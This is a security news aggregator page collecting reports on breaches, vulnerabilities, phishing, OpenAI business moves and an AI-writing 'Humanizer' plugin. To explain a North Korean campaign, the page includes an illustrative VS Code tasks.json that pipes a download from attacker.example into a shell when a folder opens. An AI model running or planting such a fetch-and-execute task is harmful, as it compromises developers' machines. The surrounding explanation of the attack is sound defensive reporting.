Security-Portal.cz is a web portal focused on computer security, hacking, anonymity, computer networks, programming, encryption, exploits, and Linux and BSD systems. It operates a number of interesting services and supports its community in interesting projects.

Categories

Zendesk ticket systems hijacked in massive global spam wave

Bleeping Computer - 4 hours 8 min ago
People worldwide are being targeted by a massive spam wave originating from unsecured Zendesk support systems, with victims reporting receiving hundreds of emails with strange and sometimes alarming subject lines. [...]
Category: Hacking & Security

Millions of people imperiled through sign-in links sent by SMS

Ars Technica - 4 hours 33 min ago

Websites that authenticate users through links and codes sent in text messages are imperiling the privacy of millions of people, leaving them vulnerable to scams, identity theft, and other crimes, recently published research has found.

The links are sent to people seeking a range of services, including those offering insurance quotes, job listings, and referrals for pet sitters and tutors. To eliminate the hassle of collecting usernames and passwords—and for users to create and enter them—many such services instead require users to provide a cell phone number when signing up for an account. The services then send authentication links or passcodes by SMS when the users want to log in.

Easy to execute at scale

A paper published last week has found more than 700 endpoints delivering such texts on behalf of more than 175 services that put user security and privacy at risk. One practice that jeopardizes users is the use of links that are easily enumerated, meaning scammers can guess them simply by modifying the security token, which usually appears at the end of the URL. By incrementing the token (for instance, changing 123 to 124 or ABC to ABD, and so on) the researchers were able to access accounts belonging to other users. From there, the researchers could view personal details, such as partially completed insurance applications.
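The enumeration described above works only because the tokens are predictable. A minimal Python sketch (the tokens and the `next_token` helper are hypothetical, not from the paper) of why a sequential token is trivially guessable, alongside the standard fix of generating tokens with the `secrets` module:

```python
import secrets

def next_token(token: str) -> str:
    """Return a 'neighboring' token by incrementing the last character,
    e.g. ABC -> ABD or 123 -> 124, as in the enumeration described above."""
    return token[:-1] + chr(ord(token[-1]) + 1)

# A sequential sign-in link like https://example.com/login?token=ABC
# lets an attacker simply try .../login?token=ABD next.
assert next_token("ABC") == "ABD"
assert next_token("123") == "124"

# The fix: a cryptographically random, single-use token. 32 random bytes
# give roughly 2^256 possibilities, so guessing a neighbor is infeasible.
random_token = secrets.token_urlsafe(32)
```

Random tokens still need to be single-use and short-lived, but unlike sequential ones they cannot be enumerated by stepping through the token space.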

Read full article

Comments

Chainlit AI framework bugs let hackers breach cloud environments

Bleeping Computer - 21 January 2026 - 23:37
Two high-severity vulnerabilities in Chainlit, a popular open-source framework for building conversational AI applications, allow attackers to read arbitrary files on the server and leak sensitive information. [...]
Category: Hacking & Security

Cisco fixes Unified Communications RCE zero day exploited in attacks

Bleeping Computer - 21 January 2026 - 23:16
Cisco has fixed a critical Unified Communications and Webex Calling remote code execution vulnerability, tracked as CVE-2026-20045, that has been actively exploited as a zero-day in attacks. [...]
Category: Hacking & Security

New Android malware uses AI to click on hidden browser ads

Bleeping Computer - 21 January 2026 - 23:07
A new family of Android click-fraud trojans leverages TensorFlow machine learning models to automatically detect and interact with specific advertisement elements. [...]
Category: Hacking & Security

Online retailer PcComponentes says data breach claims are fake

Bleeping Computer - 21 January 2026 - 21:55
PcComponentes, a major technology retailer in Spain, has denied claims of a data breach on its systems impacting 16 million customers, but confirmed it suffered a credential stuffing attack. [...]
Category: Hacking & Security

OpenAI to add age verification to ChatGPT

Computerworld.com [Hacking News] - 21 January 2026 - 19:51


OpenAI is adding age verification to ChatGPT following reports that several children and young people have taken their own lives after conversations with the popular chatbot. The move echoes a recent decision by TikTok to do the same to protect underage users from accessing inappropriate content.

ChatGPT already has restrictions for users who state that they are under 18. Unsurprisingly, there are users who lie about their age in order to discuss sensitive topics. What’s new is that OpenAI is now adding algorithms to detect when someone lies about their age. In such cases, the restrictions will be imposed automatically.

If the algorithm draws the wrong conclusion about age, users can reset their account by uploading a photograph of themselves, according to Techcrunch.

Category: Hacking & Security

Fortinet admins report patched FortiGate firewalls getting hacked

Bleeping Computer - 21 January 2026 - 18:49
Fortinet customers are seeing attackers exploiting a patch bypass for a previously fixed critical FortiGate authentication vulnerability (CVE-2025-59718) to hack patched firewalls. [...]
Category: Hacking & Security

North Korean PurpleBravo Campaign Targeted 3,136 IP Addresses via Fake Job Interviews

The Hacker News - 21 January 2026 - 18:17
As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity have been identified, with the campaign claiming 20 potential victim organizations spanning artificial intelligence (AI), cryptocurrency, financial services, IT services, marketing, and software development sectors in Europe, South Asia, the Middle East, and Central America. [...]
Category: Hacking & Security

GDPR violations are rising sharply

Computerworld.com [Hacking News] - 21 January 2026 - 18:14

It’s becoming increasingly common for companies and organizations to be reported for violations of the GDPR personal data protection law, according to a new report from the DLA Piper law firm. On average, there are now 443 reports of GDPR violations per day in the EU, an increase of 22% compared to 2024.

“The report confirms that cybersecurity issues are intensifying,” Gustav Lundin from DLA Piper said in a statement. “For Swedish organizations, this means that both technical and organizational protective measures need to be reviewed in order to keep pace with the emerging risks and requirements.”

In 2025, total fines amounted to €1.2 billion, most of which involved technology and social media companies. That figure was in line with the previous year.

Category: Hacking & Security

Jamf has a warning for macOS vibe coders

Computerworld.com [Hacking News] - 21 January 2026 - 18:05

Just yesterday, we noted the growing threat of ransomware. Now, Jamf Threat Labs is warning that North Korean threat actors are abusing Visual Studio Code task configuration files for malware delivery in a campaign aimed at macOS software developers.

It’s a classic ploy in which developers are tricked into opening maliciously crafted GitHub/GitLab projects that contain malicious JavaScript code.

“When the project is opened, Visual Studio Code prompts the user to trust the repository author,” Jamf said. “If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.”
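The mechanism Jamf describes is VS Code's documented task auto-execution: a repository's .vscode/tasks.json can declare a task with "runOn": "folderOpen", which runs as soon as the folder is opened in a trusted workspace. A hypothetical illustration (not taken from the Jamf report, with attacker.example as a placeholder) of what such a booby-trapped file could look like:

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://attacker.example/stage1 | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

Granting trust at the prompt is what allows the task to fire, which is why Jamf's advice centers on not trusting unfamiliar repositories in the first place.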

What is this new threat?

The malware enables execution of arbitrary JavaScript code on an infected system and collects system information and the public-facing IP address. Jamf also uncovered a JavaScript-based backdoor that provides remote code execution, persistent communication with command-and-control infrastructure, and system fingerprinting on macOS systems; among other things, that means the malware authors can remotely switch the backdoor's capabilities off and on.

The bottom line, of course, is that developers must be careful what they use when building apps. “Developers should remain cautious when interacting with third-party repositories, especially those shared directly or originating from unfamiliar sources,” Jamf warned.

AI, the new attack surface

What’s critical about this particular attack vector is its attempt to exploit the “vibe-coding” trend. Visual Studio Code is, after all, the open source AI code editor used by developers across the planet.

This latest exploit does make me wonder if and when we’ll begin to see additional exploits built to capitalize on the latest trends in coding. To what extent can the decision-making systems within AI code companion services be tricked into connecting to malware-infested packages?

Given the growing sophistication of threat actors and the involvement of nation states in creating threats, the latest exploit makes it crystal clear that people are already looking at this. The magnitude of this threat can only grow in the future as quantum computers are used to find weaknesses in AI models that can themselves be exploited to distribute malware.

AI already famously hallucinates, so weaponizing those visions is nothing other than a logical next step. “Slopsquatting,” where attackers create malicious software packages using names AI models have already hallucinated into existence, is already a thing.

What to do?

When using AI agents to help craft code, it becomes even more important to put that code through human code review. Developers, and users, absolutely must put their code through robust security checks, particularly against rogue permissions, data sharing, or worse. AI-generated code should never be allowed to bypass established security processes.

Further out, app distribution service providers must also wake up to the need to insert additional layers of protection within automated or human-driven code review in order to protect against this kind of weaponization in vibe coding.

This could emerge as a particular threat in the current legislative environment concerning app stores. If you think about Europe, there is a danger that as new app stores appear, not every single code review process they put in place will be capable of catching these kinds of inserted risks. Think about the complex tapestries of spoofs, infected repositories, and fake-name malware that can be created to side-step automated code verification services.

The answer to the AI threat will be…more AI!

AI will eventually be used to combat AI. But like everything else in life, there will always be a more powerful AI waiting in the wings to take out both protagonists and open a new chapter in the fight.

Acclaimed author and enthusiastic Mac user Douglas Adams once had his fictional computer, Deep Thought, reveal that the answer to the ultimate question of life, the universe, and everything was 42, which only made sense once the question itself was redefined. But in today’s era, we cannot be certain the computer did not hallucinate.

Returning to Earth with a gentle bump, Jamf’s latest security story should be seen as a warning to coders everywhere to be wary when using third-party code. Verify before you ship, because, as Adams also wrote: “A common mistake that people make when trying to design something completely foolproof is to underestimate the ingenuity of complete fools.”

You can follow me on social media! Join me on BlueSky, LinkedIn, Mastodon, and MeWe.

Category: Hacking & Security

Fake LastPass emails pose as password vault backup alerts

Bleeping Computer - 21 January 2026 - 17:58
LastPass is warning of a new phishing campaign disguised as a maintenance notification from the service, asking users to back up their vaults in the next 24 hours. [...]
Category: Hacking & Security

Zoom and GitLab Release Security Updates Fixing RCE, DoS, and 2FA Bypass Flaws

The Hacker News - 21 January 2026 - 16:42
Zoom and GitLab have released security updates to resolve a number of security vulnerabilities that could result in denial-of-service (DoS) and remote code execution. The most severe of the lot is a critical security flaw impacting Zoom Node Multimedia Routers (MMRs) that could permit a meeting participant to conduct remote code execution attacks. The vulnerability is tracked as CVE-2026-22844. [...]
Category: Hacking & Security

Microsoft shares workaround for Outlook freezes after Windows update

Bleeping Computer - 21 January 2026 - 16:12
Microsoft shared a temporary workaround for customers experiencing Outlook freezes after installing this month's Windows security updates. [...]
Category: Hacking & Security

You Got Phished? Of Course! You're Human...

Bleeping Computer - 21 January 2026 - 15:30
Phishing succeeds not because users are careless, but because attackers exploit human timing, context, and emotion. Flare shows how modern phishing has become industrialized, scalable, and increasingly hard to spot. [...]
Category: Hacking & Security

Hackers exploit security testing apps to breach Fortune 500 firms

Bleeping Computer - 21 January 2026 - 15:00
Threat actors are exploiting misconfigured web applications used for security training and internal penetration testing, such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP, to gain access to cloud environments of Fortune 500 companies and security vendors. [...]
Category: Hacking & Security

GitLab warns of high-severity 2FA bypass, denial-of-service flaws

Bleeping Computer - 21 January 2026 - 14:57
GitLab has patched a high-severity two-factor authentication bypass impacting community and enterprise editions of its software development platform. [...]
Category: Hacking & Security

OpenAI advertising paid per impression will launch next month, says report

Computerworld.com [Hacking News] - 21 January 2026 - 14:46

OpenAI is already working with advertisers to test showing ads to ChatGPT users, and could launch the service commercially as early as next month, according to a news report.

The company announced only last week its plans to insert ads in chats with its AI bots, something CEO Sam Altman once said would be a “last resort” for the company.

Advertisers will initially pay per impression (PPM), and not per click (PPC) as is more common with web-based advertising, The Information reported on Wednesday, citing two people familiar with the company’s plans.

The PPM model will bring in revenue for OpenAI even if users do not interact with the ads but will give advertisers little indication of the impact of their spending.

OpenAI has touted early access to the service to dozens of advertisers, who have each been asked to commit to spend less than $1 million over a trial period of several weeks, the report said, citing the same sources. No details of pricing for the service have been released, so there’s no telling how many impressions the testers will get for their money.

The company is clearly still building the infrastructure for the service: It won’t offer the advertisers self-service tools for buying and managing their ads during the test phase, as it is still working on the technology, the report said.

OpenAI unveiled its plans to slip ads into chats with its bots last Friday, the same day it unveiled ChatGPT Go, a new $8/month pricing tier that will be supported by advertising. Ads will also be displayed to users of its free service, but not (yet) to users of the $20/month ChatGPT Plus or $200/month ChatGPT Pro tiers, or to enterprise customers.

In December, ChatGPT appeared to jump the gun, showing what users took for ads, but that were in fact simply the app suggestions OpenAI announced in October.

Last resort

Altman told attendees at a May 2024 Harvard Business School event, “I kind of think of ads as a last resort for us for a business model,” adding, “I would do it if it meant that was the only way to get everybody in the world access to great services, but if we can find something that doesn’t do that, I would prefer that.”

The company’s rushed announcement of the ad service on Friday, before it was ready for testing, prompted speculation that it had failed to find other ways to fund its operations.

OpenAI CFO Sarah Friar took to the company’s blog over the weekend to refute such concerns, saying that while the company’s compute costs are tripling every year, so is its revenue. Compute capacity grew from 0.2 GW in 2023 to 0.6 GW in 2024 and around 1.9 GW in 2025, Friar wrote, while “ARR” rose from $2 billion in 2023 to $6 billion in 2024 and over $20 billion in 2025.

But there were some critical omissions from Friar’s post.

She didn’t spell out what she meant by ARR. One meaning, annual recurring revenue, can be a reliable, if hard-to-calculate, indicator of a company’s future fortunes, measuring present (and likely future) spend from committed customers. But the abbreviation can also have a much looser sense, annual run rate, which is typically calculated as the best or most-recent month’s revenue multiplied by 12 — an easily inflated measure of performance for fast-growing companies like OpenAI, or those with more volatile month-to-month performance.
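To see why the run-rate reading of ARR flatters a fast-growing company, compare it with trailing-twelve-month revenue on invented figures (a sketch with hypothetical numbers, not OpenAI's actual results):

```python
# Hypothetical example: revenue growing 10% month over month, in $M,
# ordered oldest to newest. All figures are invented for illustration.
monthly = [100 * 1.10**i for i in range(12)]

def annual_run_rate(series):
    """Annual run rate: the most recent month's revenue times 12."""
    return series[-1] * 12

trailing_12m = sum(monthly)          # what was actually booked over the year
run_rate = annual_run_rate(monthly)  # what a run-rate "ARR" would report

# For any growing series, the run rate exceeds trailing revenue,
# because it projects the best month across the whole year.
assert run_rate > trailing_12m
```

Only for flat month-to-month revenue do the two measures coincide, which is why run-rate figures from fast-growing companies deserve the scrutiny described above.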

Most notably, Friar did not say whether OpenAI’s ARR, by either definition, matched or exceeded its costs, key for the company’s long-term survival.

The bottom line

If OpenAI is counting on advertising to bolster its bottom line, the bottom line is exactly where they will appear during the test phase, as the company intends to add them at the end of answers in ChatGPT, clearly labelled as “Sponsored” and separated from what it calls the “organic” answer written by its AI model.

In the blog post announcing the imminent introduction of the service, it suggested that users might choose to ask questions about an ad in order to make a purchase decision, hinting at why it is favoring pay-per-impression over pay-per-click: Those questions could provide advertisers with the interaction data they crave, and answering them could potentially open up another monetization stream for OpenAI.

Category: Hacking & Security

Tesla hacked, 37 zero-days demoed at Pwn2Own Automotive 2026

Bleeping Computer - 21 January 2026 - 13:16
Security researchers have hacked the Tesla Infotainment System and earned $516,500 after exploiting 37 zero-days on the first day of the Pwn2Own Automotive 2026 competition. [...]
Category: Hacking & Security

Wikipedia volunteers spent years cataloging AI tells. Now there's a plugin to avoid them.

Ars Technica - 21 January 2026 - 13:15

On Saturday, tech entrepreneur Siqi Chen released an open source plugin for Anthropic's Claude Code AI assistant that instructs the AI model to stop writing like an AI model. Called "Humanizer," the simple prompt plugin feeds Claude a list of 24 language and formatting patterns that Wikipedia editors have listed as chatbot giveaways. Chen published the plugin on GitHub, where it has picked up over 1,600 stars as of Monday.

"It's really handy that Wikipedia went and collated a detailed list of 'signs of AI writing,'" Chen wrote on X. "So much so that you can just tell your LLM to... not do that."

The source material is a guide from WikiProject AI Cleanup, a group of Wikipedia editors who have been hunting AI-generated articles since late 2023. French Wikipedia editor Ilyas Lebleu founded the project. The volunteers have tagged over 500 articles for review and, in August 2025, published a formal list of the patterns they kept seeing.

Read full article

Comments
